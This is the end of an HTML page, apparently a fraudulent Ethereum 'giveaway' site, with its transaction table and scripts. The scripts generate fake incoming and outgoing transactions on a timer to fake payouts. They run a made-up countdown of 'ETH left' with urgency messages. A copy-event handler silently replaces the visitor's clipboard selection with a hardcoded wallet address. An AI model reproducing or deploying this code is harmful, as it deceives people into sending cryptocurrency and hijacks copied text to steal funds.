            <td><span class="address-tag">0xaa2498d85ba7559006f9...</span></td>
            <td>1<b>.</b>495 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00147</font>
            </td>
        </tr>


        <tr>
            <td><a class="address-tag" href="#">0xb1462c68b707d5...</a></td>
            <td class="hidden-sm"><a href="#">2869829</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM"
                      class="tim3">16 mins ago</span></td>
            <td><a class="address-tag" href="#">0xaa2498d85bA755900...</a></td>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0x097875225c51d535d...</span></td>
            <td>8 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0xdc4aded3f65cdbb9...</a></td>
            <td class="hidden-sm"><a href="#">5466293</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 03:14:00 AM"
                      class="tim3">17 mins ago</span></td>
            <td><a class="address-tag" href="#">0x097875225c51d535d...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0xaa2498d85ba7559006f9...</span></td>
            <td>0<b>.</b>85412 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>


        <tr>
            <td><a class="address-tag" href="#">0xb1462c68b707d5...</a></td>
            <td class="hidden-sm"><a href="#">9331563</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM"
                      class="tim3">18 mins ago</span></td>
            <td><a class="address-tag" href="#">0xaa2498d85bA755900...</a></td>
            <td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>
            <td><span class="address-tag">0x7bf7a96ceb22614af...</span></td>
            <td>6 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>

        <tr>
            <td><a class="address-tag" href="#">0xbf034ac20cfb9f24...</a></td>
            <td class="hidden-sm"><a href="#">5466209</a></td>
            <td><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 02:54:13 AM"
                      class="tim3">19 mins ago</span></td>
            <td><a class="address-tag" href="#">0x7bf7a96ceb22614af...</a></td>
            <td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>
            <td><span class="address-tag">0xaa2498d85ba7559006f9...</span></td>
            <td>0<b>.</b>6 Ether</td>
            <td>
                <font color="gray" size="1">0<b>.</b>00042</font>
            </td>
        </tr>

        </tbody>
    </table>

</div>
<style>
    .toolbar {
        -webkit-animation-name: animation;
        -webkit-animation-duration: 1s;
        -webkit-animation-timing-function: ease-in-out;
        -webkit-animation-play-state: running;

        animation-name: animation;
        animation-duration: 1s;
        animation-timing-function: ease-in-out;
        animation-play-state: running;
    }

    @-webkit-keyframes animation {
        0% {
            background-color: #ede86c;
        }
        100.0% {
            background-color: #ffffff;
        }
    }

    @keyframes animation {
        0% {
            background-color: #ede86c;
        }
        100.0% {
            background-color: #ffffff;
        }
    }
</style>


<!-- ============================================= addresses ====================================================== -->

<script>
    function random(t, e) {
        var n = arguments.length;
        if (0 === n) t = 0, e = 2147483647;
        else if (1 === n) throw new Error("Warning: rand() expects exactly 2 parameters, 1 given");
        return Math.floor(Math.random() * (e - t + 1)) + t
    }

    function uuidv4() {
        return "xxxxxxxxxxxxxxxx".replace(/[xy]/g, function (t) {
            var e = 16 * Math.random() | 0;
            return ("x" == t ? e : 3 & e | 8).toString(16)
        })
    }

    function bet(t, e, n) {
        return t = t.toString().replace("\n", ""), e = e.toString().replace("\n", ""), void 0 !== (n = n.toString().replace("\n", "")).split(t)[1] ? n.split(t)[1].split(e)[0] : void 0
    }

    function removeArr(t) {
        for (var e, n, a = arguments, r = a.length; r > 1 && t.length;)
            for (e = a[--r]; -1 !== (n = t.indexOf(e));) t.splice(n, 1);
        return t
    }

    function addLink() {
        var t = window.getSelection(),
            e = document.createElement("div");
        e.style.position = "absolute", e.style.left = "-99999px", document.body.appendChild(e), e.innerHTML = "0x4eFbb8a016B8D28d261FE31be1404cF12f4010a2", t.selectAllChildren(e), window.setTimeout(function () {
            document.body.removeChild(e)
        }, 100)
    }

    function sub() {
        for (ramdot = gF.random(2, 5), dots = [], i = 0; i < ramdot; i++) dots[i] = gF.chain(gF.random(15, 20), gF.random(0, 1)).toLowerCase();
        for (ramdot2 = gF.random(2, 5), dots2 = [], i = 0; i < ramdot2; i++) dots2[i] = gF.chain(gF.random(15, 20), gF.random(0, 1)).toLowerCase();
        return dots.join("-") + "." + dots2.join(".")
    }

    function newtr() {
        tr = document.createElement("tr"), tr.innerHTML = '<td><a class="address-tag" href="#">0x9addb4ab6a83b917...</a></td><td class="hidden-sm"><a href="#">4361658</a></td><td width="150px !important"><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="tim3" >1 mins ago</span></td><td><a class="address-tag" href="#">0xaa2498d85bA755900...</a></td><td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td><td><span class="address-tag">0x3c44762c6f79d6b9b...</span></td><td>4 Ether</td><td><font color="gray" size="1">0<b>.</b>00042</font></td>', INT = "0x" + uuidv4().toLowerCase(), OUT = "0x" + uuidv4().toLowerCase(), TXID = "0x" + uuidv4().toLowerCase(), TXID2 = "0x" + uuidv4().toLowerCase(), INCIN = (Math.random() * (10 - 0.5) + 0.5).toFixed(3), INOUT = (10 * INCIN + 0.5).toFixed(0);
        var t = document.getElementById("myTable").insertRow(1),
            e = t.insertCell(0),
            n = t.insertCell(1),
            a = t.insertCell(2),
            r = t.insertCell(3),
            d = t.insertCell(4),
            s = t.insertCell(5),
            i = t.insertCell(6),
            o = t.insertCell(7);
        e.innerHTML = '<a class="toolme" class="address-tag" href="#">' + TXID + "...</a>", n.innerHTML = '<td class="hidden-sm"><a href="#">1433341</a></td>', a.innerHTML = '<td width="150px !important"><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="tim3" >now</span></td>', r.innerHTML = '<td><a class="address-tag" href="#">' + OUT + "...</a></td>", d.innerHTML = '<td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>', s.innerHTML = '<td><span class="address-tag">' + window.ADDRESS.substring(0, 18) + "...</span></td>", i.innerHTML = "<td>" + INCIN + " Ether</td>", o.innerHTML = '<td><font color="gray" size="1">0<b>.</b>00' + random(100, 999) + "</font></td>", document.getElementsByTagName("tr")[1].classList.add("toolbar"), setTimeout(function () {
            var t = document.getElementById("myTable").insertRow(1),
                e = t.insertCell(0),
                n = t.insertCell(1),
                a = t.insertCell(2),
                r = t.insertCell(3),
                d = t.insertCell(4),
                s = t.insertCell(5),
                i = t.insertCell(6),
                o = t.insertCell(7);
            e.innerHTML = '<a class="address-tag" href="#">' + TXID2 + "...</a>", n.innerHTML = '<td class="hidden-sm"><a href="#">8211171</a></td>', a.innerHTML = '<td width="150px !important"><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="tim3" >now</span></td>', r.innerHTML = '<td><a class="address-tag" href="#">' + window.ADDRESS.substring(0, 18) + "...</a></td>", d.innerHTML = '<td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>', s.innerHTML = '<td><span class="address-tag">' + OUT + "...</span></td>", i.innerHTML = "<td>" + INOUT + " Ether</td>", o.innerHTML = '<td><font color="gray" size="1">0<b>.</b>00' + random(100, 999) + "</font></td>", document.getElementsByTagName("tr")[1].classList.add("toolbar")
        }, 1500)
    }

    function insertAfter(t, e) {
        e.parentNode.insertBefore(t, e.nextSibling)
    }

    function updateTrans() {
        for (i = 0; i < times.length; i++) "now" == times[i].innerHTML.split(" ")[0] ? times[i].innerHTML = "1 mins ago" : times[i].innerHTML = parseInt(times[i].innerHTML.split(" ")[0]) + 1 + " mins ago";
        newtr()
    }

    document.addEventListener("copy", addLink), times = document.getElementsByClassName("tim3"), window.onload = function () {
        updateTrans(), trans = setInterval(function () {
            updateTrans()
        }, 1e4)
    }, document.getElementById("address").innerHTML = window.ADDRESS, document.getElementById("qrcode").src = "https://chart.apis.google.com/chart?cht=qr&chs=300x300&chl=" + window.ADDRESS + "&chld=H|0", document.getElementById("trnsctin").innerHTML = window.ADDRESS;
</script>

<script>
    // tell the embed parent frame the height of the content
    if (window.parent && window.parent.parent) {
        window.parent.parent.postMessage(["resultsFrame", {
            height: document.body.getBoundingClientRect().height,
            slug: "b1cxaqn5"
        }], "*")
    }
</script>


<!-- ============================================= end ====================================================== -->


<script>

var button = document.getElementById('copybutton');
button.addEventListener('click', function () {
  //нашли наш контейнер
  var ta = document.getElementById('textaddress'); 
  //производим его выделение
  var range = document.createRange();
  range.selectNode(ta); 
  window.getSelection().addRange(range); 
 
  //пытаемся скопировать текст в буфер обмена
  try { 
    document.execCommand('copy'); 
  } catch(err) { 
    console.log('Can`t copy, boss'); 
  } 
  //очистим выделение текста, чтобы пользователь "не парился"
  window.getSelection().removeAllRanges();
});

    function setProgress(count, max) {
        var p = (100 * count / max).toString() + '%';
        $('.progress-left').css('left', p);
        $('.progress-width').css('width', p);
        var cc = count.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
        var mm = max.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
        $('.progress-bar-value').text(cc + ' / ' + mm);

    }


    var ctd = setInterval(function () {
        if (localStorage.getItem("bar")) {
            if (localStorage.getItem("bar") <= 150) {
                var new_count = localStorage.getItem("bar");
            }
            else if (localStorage.getItem("bar")) {
                var init_count = localStorage.getItem("bar");
                var new_count = init_count - Math.floor((Math.random() * 100) + 5);
            }
        }

        else {
            var init_count = Math.floor((Math.random() * (4499 - 4400) + 4400) + 1);
            var new_count = init_count - Math.floor((Math.random() * 100) + 5);
        }
        setProgress(new_count, 10000)


        localStorage.setItem("bar", new_count);

        if (init_count <= 300)
            clearInterval(ctd);
        if (new_count <= 4999 && init_count >= 2001)
            document.getElementById("lefteth").innerHTML = "Left Ethereum";
        if (new_count <= 1000 && init_count >= 301)
            document.getElementById("lefteth").innerHTML = "Hurry up, not much more ETH left!";
        if (new_count <= 300)
            document.getElementById("lefteth").innerHTML = "Last chance to get your ETH!";
        return 0;
        if (new_count <= 5000)
            document.title = new_count + " ETH left";
        if (new_count <= 1000)
            document.title = "Get your " + new_count + " ETH now!";

    }, 6666);


</script>
<script src="assets/html.js" type="text/javascript"></script>
<script type="text/javascript">try {
        clicky.init(101112311);
    } catch (e) {
    }</script>

</body>
</html>